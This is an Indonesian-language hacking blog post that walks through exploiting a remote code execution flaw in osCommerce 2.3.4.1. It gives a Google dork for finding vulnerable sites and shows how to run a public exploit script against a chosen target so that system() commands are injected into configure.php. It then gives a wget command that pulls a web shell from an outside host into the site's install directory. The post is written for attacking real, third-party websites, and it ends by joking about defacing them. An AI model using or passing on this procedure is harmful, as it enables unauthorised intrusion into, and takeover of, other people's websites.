OsCommerce 2.3.4.1 Remote Code Execution

byMuhammad Rasyad -
0

Baca Juga

Selamat siang ges bek lagi dengan aku anak nolep gada kerjaan :'(, Karena gada kerjaan makanya tak ngego-blog lagi muehehe.

Siang ini w share exploit OsCommerce 2.3.4.1 Remote Code Execution. Disini aink pake tool dari Simon Scanell ref from Exploit-DB. Download tool
Simpan dengan ekstensi .py
Tools ini berguna untuk menyisipkan script remote command ke dalam file config web target yg ada pada configure.php
Dork:
inurl:/oscommerce-2.3.4.1

Sebelum jalanin toolnya edit dulu toolnya di bagian base_url dan target_url edit jadi web target mu.


Perhatikan gambar diatas, pada bagian system("ls -la"); adalah command untuk kita mengeksekusi web target.
NB: ls -la adalah perintah untuk memunculkan dir listing nya

Jalankan toolnya dan biarkan dia bekerja
python2 tool.py
Jika seperti itu berarti sukses :D
Bagaimana cara melihat list dir-nya? Ke file configure.php (salin aja url yg dibawah itu)
Bakekok muncul mzz :"v

Upload shell tinggal wget ajh bng ganti ls -la nya jadi wget (wget http://linkshell.com/shell.txt -O shell.php) akses Shell di ~> /oscommerce-2.3.4.1/catalog/install/includes/shell.php
Selesai tinggal mpsh mpsh web na hehehe


Tags

Muhammad Rasyad

I'm just an ordinary weeb who likes technology stuff and to learn about coding and cyber security

Anda mungkin menyukai postingan ini

Posting Komentar

Lebih baru Lebih lama